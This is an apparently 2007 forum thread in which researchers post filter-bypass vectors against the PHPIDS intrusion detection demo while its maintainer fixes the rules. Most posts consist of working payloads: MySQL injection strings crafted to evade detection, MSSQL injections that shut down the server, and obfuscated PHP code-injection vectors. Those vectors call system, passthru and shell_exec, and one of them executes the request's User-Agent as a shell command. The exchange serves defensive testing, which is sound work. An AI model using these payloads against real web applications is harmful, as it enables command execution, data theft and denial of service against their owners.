MSSQL DoS/slow down (if thats still in the scope of the project):

--> ?test=1'; anything: goto anything -- -a (php-ids)
--> ?test=1'; WAITFOR TIME '17:48:00 ' shutdown -- -a (php-ids)


Never worked with it, but in addition to tx php injections these two would also work I think:

--> ?test=aa"; { passthru("shutdown -s"); } // (php-ids)
--> ?test=aa"; shell_exec("shutdown -s"); // (php-ids)



Edited 1 time(s). Last edit at 10/03/2007 11:03AM by Reiners.

Hi!

I think I have them all fixed again w/o too much false positives (at least the tests tell me so *g*).

@tx: The RFE vectors are awesome again - i am still very glad that PHP demands way more strictness for its coding than other languages! ;)

@Reiners: Wow - neat. Especially the ultra short ones were very hard to come by.

Thank a lot again - I think we'll be ready for 0.4.2 soon! Btw - I will be afk from 7th to 14th of October and lying around close to a swimming pool so forgive me if there will be no fixes during that time ;)

Greetings,
.mario

Hi .mario!
very nice fixes!!
only one little injection slipped through:
' =+ ' (php-ids)

greetings and relaxing vacation,
Reiners

Yikes - fixed, thx! ;)

I started to add first material to the VectorWiki - it's still very basic though and the admins haven't set the sub domain yet..

https://trac.php-ids.org/wiki/VectorWiki

I wont let you go to vacation now ;)
asd' =- (-'asd') -- -a (php-ids)
asd' |1 != (1)#aa (php-ids)



Edited 3 time(s). Last edit at 10/03/2007 12:05PM by Reiners.

another fix to earn my holidays ;) thx!

watch out for spaces:
asd' =- ( - 'asd' ) -- -a (php-ids)

It's just incredible how flexible the MySQL syntax is. MSSQL is much more strict on that.
Note that I have edited the first and the third post on this page while you responded so quickly, so maybe you overlooked it.

greetings,
Reiners

Hi!
Again some MySQLi ... some dont make sense actually, but they all work. damn MySQL, not only javascript is weird. As you can see its almost always the same trick: using alot of different prefixes and brackets. But I thought the more examples given - the easier is the fixing. So it isnt actually that much as it looks ;)

' =+ - ' (php-ids)
asd' =+ ('asd') -- -a
asd' =+-('asd') -- -a (php-ids)
asd' =+ - ( + 'asd' ) -- -a (php-ids)

asd' |+(1) != '1 (php-ids)
asd' |(1) != +'1 (php-ids)

aa'+2 = '0 (php-ids)
aa' - 2 =+ -'0 (php-ids)
aa'+2-((-1)) =+ -'0 (php-ids)

0' XOR+ -'1 (php-ids)

aa' LIKE + -'0 (php-ids)
aa'LIKE+ -'0
aa'LIKE (0) -- -a
aa'LIKE +(0) -- -a
aa'LIKE + ( -0) -- -a (php-ids)

aa' REGEXP+ - '0 (php-ids)
aa' REGEXP+ -(- 0) -- -a (php-ids)

aa' SOUNDS LIKE+ -'1 (php-ids)
aa' SOUNDS LIKE+ (1) -- -a (php-ids)
(works not if column type is int)

aa' in +(0) -- -a(php-ids)
aa' in +(-0,-1) -- -a
aa'in+ ('aa') or -1 != '0 (php-ids)

root@localhost' =+ current_user -- -a (php-ids)
(attacker need to figure out what the default user is, so this is probably not that dangerous)

As you can see, on MySQL you can use prefixes, spaces, brackets and quotes almost everywhere and as much as you like. It is really really hard to filter all those things correctly I think.

PHPi:
"; { if (true) passthru("dir"); } // (php-ids)

greetings,
Reiners

Well I've been messing with Javascript again :)

This doesn't work (score of 5) but I thought I'd post it anyway:-
new Image().src= !null?'javascriptz:zalertz(1)'['split']('z')['join']([]):0

Tested under Opera but may also work in IE

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

*finished fixing* you mean 10 ;)

Hi .mario!
very nice fixes, its getting harder and harder ;)

aa' LIKE 0 -- -a (php-ids)
aa' LIKE md5(1) or '1 (php-ids)
aa' REGEXP- md5(1) or '1 (php-ids)
aa' DIV@1 = 0 or '1 (php-ids)
aa' XOR- column != -'0 (php-ids)

The first expression often doesnt work on its own. its correct syntax, but it doesnt return true. I just use it to place the "or" on a different place than right behind the quote (where it is impossible to get it to work undetected ;)

greetings,
Reiners

@.mario: The filters are getting really challenging now.

Here's some variations on a PHPi that Reiners posted yesterday:
http://demo.php-ids.org/?test=%22%3B%7B%20if%20%28true%29%20%24_a%20%20%3D%20%22%22%20.%20strtolower%28%22pass%22%29%3B%0Aif%20%20%20%281%29%20%24_a.%3D%20%22%22%20.%20strtolower%28%22thru%22%29%3B%20%0A%24_a%28%20%22dir%22%29%3B%20%7D%20//

?test=";{ if (true) $_a  = "" . strtolower("pass");
if   (1) $_a.= "" . strtolower("thru"); 
$_a( "dir"); } //

http://demo.php-ids.org/?test=%22%3B%7B%20if%20%28true%29%20%24_a%20%20%3D%20%22%22%20.%20str_replace%28%27%21%27%2C%27%27%2C%27s%21y%21s%21t%21e%21m%21%27%29%3B%0A%24_a%28%20%22dir%22%29%3B%20%7D%20//

?test=";{ if (true) $_a  = "" . str_replace('!','','s!y!s!t!e!m!');
$_a( "dir"); } //

Some new techniques in this one: http://demo.php-ids.org/?test=%22%20%3B%20//%0A%24_y%20%3D%20%22%22%20.%20strrev%28%22ftnirp%22%29%3B%0Aif%20%20%28%210%29%20%20%20%20%24_a%20%3D%20base64_decode%20%3B%0Aif%20%20%28%210%29%20%20%20%20%24_b%3D%22%22%20.%20%24_a%28%27cHdk%27%29%3B%0Aif%20%28%210%29%20%24_y%28%60%24_b%60%29%3B//

?test=" ; //
$_y = "" . strrev("ftnirp");
if  (!0)    $_a = base64_decode ;
if  (!0)    $_b="" . $_a('cHdk');
if (!0) $_y(`$_b`);//

EDIT: This one could use some explaining. Payload is a base64 encoded command in the b GET variable, the code parses the query_string and assigns the $_GET['b'] to $b which is then decoded and ran through the backtick execution operators (``) and output through an aliased printf. Also note that eval respects new lines so the comment marks don't actually comment any code. http://demo.php-ids.org/?test=%22%20%3B%20//%0Aif%20%20%28%210%29%20%24_a%20%3D%20base64_decode%20%3B%0Aif%20%20%28%210%29%20%24_b%20%3D%20parse_str%20%3B%20//%0A%24_c%20%3D%20%22%22%20.%20strrev%28%22ftnirp%22%29%3B%0Aif%20%20%28%210%29%20%20%24_d%20%3D%20QUERY_STRING%3B%20//%0A%24_e%3D%20%22%22%20.%20%24_SERVER%5B%24_d%5D%3B%0A%24_b%28%24_e%29%3B%20//%0A%24_f%20%3D%20%22%22%20.%20%24_a%28%24b%29%3B%0A%24_c%28%60%24_f%60%29%3B//&b=cHdk

?test=" ; //
if  (!0) $_a = base64_decode ;
if  (!0) $_b = parse_str ; //
$_c = "" . strrev("ftnirp");
if  (!0)  $_d = QUERY_STRING; //
$_e= "" . $_SERVER[$_d];
$_b($_e); //
$_f = "" . $_a($b);
$_c(`$_f`);//

EDIT: Shorter variation shoving all identifiable names into the request string. (Register Globals = On) http://demo.php-ids.org/?test=%22%3B%20//%0A%24_c%20%3D%20%22%22%20.%20%24_a%28%24b%29%3B%0A%24_b%28%60%24_c%60%29%3B//&b=ZGly&_a=base64_decode&_b=printf

?test="; //
$_c = "" . $_a($b);
$_b(`$_c`);//

This is how the attack would actually look:

h++p://victim.com/index.php
?injection_point=%22%3B%20//%0A%24_c%20%3D%20%22%22%20.%20%24_a%28%24b%29%3B%0A%24_b%28%60%24_c%60%29%3B//
&b=ZGly
&_a=base64_decode
&_b=printf
&submit=submit

EDIT: I just realized, I wrote one of those vectors redundantly it should be:

?test=" ; //
if  (!0) $_b = parse_str ; //
$_c = "" . strrev("ftnirp"); //
$_e= "" . $_SERVER[$_d];
$_b($_e); //
$_f = "" . $_a($b);
$_c(`$_f`);//

attack looks like:
h++p://demo.php-ids.org/?test=%22%20%3B%20//%0Aif%20%20%28%210%29%20%24_b%20%3D%20parse_str%20%3B%20//%0A%24_c%20%3D%20%22%22%20.%20strrev%28%22ftnirp%22%29%3B%20//%0A%24_e%3D%20%22%22%20.%20%24_SERVER%5B%24_d%5D%3B%0A%24_b%28%24_e%29%3B%20//%0A%24_f%20%3D%20%22%22%20.%20%24_a%28%24b%29%3B%0A%24_c%28%60%24_f%60%29%3B//
&b=cHdk
&_a = base64_decode
&_d=QUERY_STRING

It still gets caught (Score: 7) but I felt I should at least clarify.

-tx @ lowtech-labs.org



Edited 15 time(s). Last edit at 10/08/2007 11:41PM by tx.

blah, blah, blah another variation. I was thinking about sirdarckcat and eval'ing document.location. pretty much the concept that there is certain data that isn't likely to be checked (either due to possibility or context), ie. in the case of javascript the post hash characters, and in this case, certain variables. This is related to the Register Globals=On vector, which has damn near infinite possibilites, but seems extremely difficult to filter against. (I mean

?test=" ; $_a( `$_b` );//

could potentially root or completely DoS a server (and get's through the filter of course) but really, how common is that vulnerability? But then again, if you've got code that's eval'ing a string that contains user input and your server has Register Globals set to 'on', you're pretty much asking to get pwnd. *shrug*
Anyway, enough talk: http://demo.php-ids.org/?test=%22%20%3B%20//%0Aif%20%28%210%29%20%24_a%20%3D%20%22%22%20.%20str_rot13%28%27cevags%27%29%3B%20//%0A%24_b%20%3D%20HTTP_USER_AGENT%3B%20//%0A%24_c%3D%20%22%22%20.%20%24_SERVER%5B%24_b%5D%3B%20//%0A%24_a%28%20%60%24_c%60%20%29%3B//
Vector works with register globals off and executes whatever the user has put in their user-agent, on the command line.

?test=" ; //
if (!0) $_a = "" . str_rot13('cevags'); //
$_b = HTTP_USER_AGENT; //
$_c= "" . $_SERVER[$_b]; //
$_a( `$_c` );//

I think perhaps these php vectors are getting a bit too esoteric. @.mario: just say the word and I'll go back to something more sensible. :)
sure is fun though!

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 10/04/2007 09:13PM by tx.

@tx: Nice ones indeed! Nope - there's nothing esoteric enough as long as it works - but I guess the next code execution vectors should be a little bit more complicated to inject ;) Thanks again!

@Reiners: Thx - i will take care of those ASAP! *fixed*

Greetings,
.mario



Edited 1 time(s). Last edit at 10/05/2007 11:00AM by .mario.

@.mario: Great fixes again, you're making this nice and fun. I can only tip my hat to your regex prowess... it's a lot easier for me to get around these rules than it would be for me to write them! *tips hat*

Anyway, the

(?:<[?%](?:php)?.*(?:[?%]>)?)|(?:;\s*\$\w+\s*=)|(?:\$\w+\s*=(?:(?:\s*\$?\w+\s*[(;])|\s*".*"))

rule can be circumvented by prepending a null value to the string/constant/function name thats being assigned to a variable: http://demo.php-ids.org/?test=%22%3B%7B%20if%20%28true%29%20%24_a%20%20%3D%20%24_n%20.%20str_replace%28%27%21%27%2C%27%27%2C%27s%21y%21s%21t%21e%21m%21%27%29%3B%20//%0A%24_a%28%20%22dir%22%29%3B%20%7D%20//

?test=";{ if (true) $_a  = $_n . str_replace('!','','s!y!s!t!e!m!'); //
$_a( "dir"); } //

Where $_n is anything that evaluates to null or false. (ie !1 , any uninitialized variable, equations, etc., but not anything that === 0), here are a few examples/test cases:

?test=";{ if (true) $_a  = !1 . str_replace('!','','s!y!s!t!e!m!'); //
$_a( "dir"); } //

?test=";{ if (true) $_a  = @(1/0) . str_replace('!','','s!y!s!t!e!m!'); //
$_a( "dir"); } //

I think catching anything matching the pattern:

{",'}; {any characters} ${alphanums,_} = {any characters} . {any characters};

would effectively kill that vector (and alot of potential variations).

-tx @ lowtech-labs.org



Edited 4 time(s). Last edit at 10/05/2007 10:03PM by tx.

Hi!

Thanks, tx. I added a new pattern for that kind of injection - pretty much like the one you suggested.

Greetings,
.mario

@.mario: That's catching just about everything now. Just one more:
http://demo.php-ids.org/?test=%22%3B//%0A%7B%20if%20%28%21%22%7D%22%29%7B%0A%3B%0A%7Delse%7B%20%24_a%20%20%3D%20%21%22%29%22%20.%20str_replace%28%22%21%22%2C%22%22%2C%22s%21y%21s%21t%21e%21m%21%22%29%3B%20//%0A%24_a%28%20%22dir%22%29%3B%20%7D%7D%20//

?test=";//
{ if (!"}"){
;
}else{ $_a  = !")" . str_replace("!","","s!y!s!t!e!m!"); //
$_a( "dir"); }} //

Have a good vacation! :)

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 10/06/2007 01:25PM by tx.

aa'LIKE(0) -- -a (php-ids)
aa'regexp(0) -- -a (php-ids)
consider that you can use prefixes and spaces in the brackets as well as infront of the brackets, since these are not functions.

greetings,
Reiners

Hi!

Thanks guys - see you back in a week...

Greetings,
.mario

Hi!

I survived the vacation and even managed to fix the latest injections ;) Furthermore I added support for the ENTITY/ELEMENT xml injection patterns and some dangerous hex entities
when coming to sql injections.

We will change the paths in the config from relative to absolute the next days (this will take some time because we have to rewrite the whole test suite) - after that we will release 0.4.2.

@Reiners: I would like to feature an article/interview with you on php-ids.org about sql injection and webappsec in general. Please drop me a line if you are interested.

Greetings!
.mario

Hi .mario!
welcome back ;) I'm really looking forward to the interview, although I feel a bit awkward to speak beside all the other experts since I'm somewhat new to webappsec. I will give my best ;)

aa' like(0) -- -a (php-ids)
aa' regexp (0) -- -a (php-ids)
(space behind the quote)

greetings,
Reiners

----------------
edit:

'/1=' (php-ids)
aa'/1='0
aa'/1 like '0
aa'/1 or+1=+'1
aa'/0 is null-- -a

aa'%1='0 (php-ids)
aa'%1 or+1=+'1

aa'<3 or+1=+'1 (php-ids)
aa'<=3 or+1=+'1
aa'<<3 or+1=+'1

aa'^0='0 (php-ids)
aa'^3 or+1=+'1

aa'&1='aa (php-ids)
aa'&1 or+1=+'1

The trick is to place some unfiltered math operations before the real injection. Besides the "or" you can also use "like" and "regexp" of course.

edit²:
aa' like +0 -- (php-ids)



Edited 3 time(s). Last edit at 10/18/2007 09:57AM by Reiners.

adding more math to circumvent new filters:

(php-ids) aa'/1 DIV 1 or+1=+'1
(php-ids) aa'&0+1='aa
(php-ids) aa' like(0) + 1-- -a
(php-ids) aa'^0+0='0
(php-ids) aa'^0+0+1-1=(0)-- -a
(php-ids) aa'<3+1 or+1=+'1
(php-ids) aa'%1+0='0
(php-ids) '/1/1='

as always, there are quite some modifications possible by using different operands, prefixes, spaces, quotes and (brackets).

operand = array("^", "=", "!=", "%", "/", "&", "&&", "|", "||", "<", "<<", ">", ">>", ">=", "<=", "<>", " XOR ", " DIV ");
prefix = array("+", "-", "~", "!", "@", " ");

greetings,
Reiners

Hi Reiners!

Thx again - they all should be fixed by now. Tomorrow we will release 0.4.2 and after that I will get back to you for the interview.

Greetings,
.mario

Hi .mario!
I'm looking forward to that =)
As mentioned in my last post there are a lot of modifications possible. some examples:

(php-ids) aa'/1 or '1 (different payload)
(php-ids) aa'/1 regexp '0 (different payload)
(php-ids) ' / 1 / 1 =' (spaces)
(php-ids) '/1=' (unfixed ;)
(php-ids) aa'&0+1 = 'aa (spaces)
(php-ids) aa'&+1='aa (prefix)
(php-ids) aa'&(1)='aa (or bracket)
(php-ids) aa'^0+0 = '0 (spaces)
(php-ids) aa'^0+0+1-1 = (0)-- -a (spaces)
(php-ids) aa'^+-3 or'1 (prefixes)
(php-ids) aa'^0!='1 (different operand)
(php-ids) aa'^(0)='0 (brackets)
(php-ids) aa' < (3) or '1 (brackets)
(php-ids) aa' <<3 or'1 (different payload)
(php-ids) aa'-+!1 or '1 (prefixes)
(php-ids) aa'-!1 like'0 (prefixes)
(php-ids) aa' % 1 or '1 (spaces)

greetings,
Reiners



Edited 1 time(s). Last edit at 10/23/2007 09:53AM by Reiners.

Hi!

They should all be fixed right now - the tests tell me so ;) Thanks again - some of them were really hard to come by!

Greetings,
.mario

Hi .mario!
new stuff for you ;)
most common trick is still using spaces:

(php-ids) aa' / '1' < '3
(php-ids) aa' / +1 < '3
(php-ids) aa' - + ! 2 != + - '1
(php-ids) aa' - + ! 1 or '1
(php-ids) aa' / +1 like '0
(php-ids) ' / + (1) / + (1) ='
(php-ids) aa' & +(0)-(1)='aa
(php-ids) aa' ^+ -(0) + -(0) = '0
(php-ids) aa' ^ + - 3 or '1
(php-ids) aa' ^ +0!='1
(php-ids) aa' < +3 or '1
(php-ids) aa' % +1 or '1

but as I said, there are so many different modifications possible its hard to get them all ;)

greetings,
Reiners

Hi!

Those were hard ones again but I think they taught me to write a rule that catches all of the latest submissions... let's see *fixxed*

;)

Greetings,
.mario

damn, tough rule, very nice !! Could not modify one of the above attacks successfully.
I just noted a missing prefix before "like" in the rule:

(php-ids) aa'like!'1

Very nice fixes.
greeting,
Reiners

another two:

(php-ids) '< ~' (yes, it works on mysql ;)
([url=http://demo.php-ids.org/?test=1'%20%3C%20ascii('1')%20%23aaa 1']php-ids[/url]) 1' < ascii('1') #aaa
0' !=+ ascii('1') #aaa
0' = + ! ascii('1') #aaa

greetings,
Reiners

.mario,
This is still undetected:
http://demo.php-ids.org/?test=%27%20or%20MATCH%20%28username%29%20AGAINST%20%28%27+admin%20-asds%27%20IN%20BOOLEAN%20MODE%29%3B%20--%20-a

?test=' or MATCH (username) AGAINST ('+admin -asds' IN BOOLEAN MODE); -- -a

-tx @ lowtech-labs.org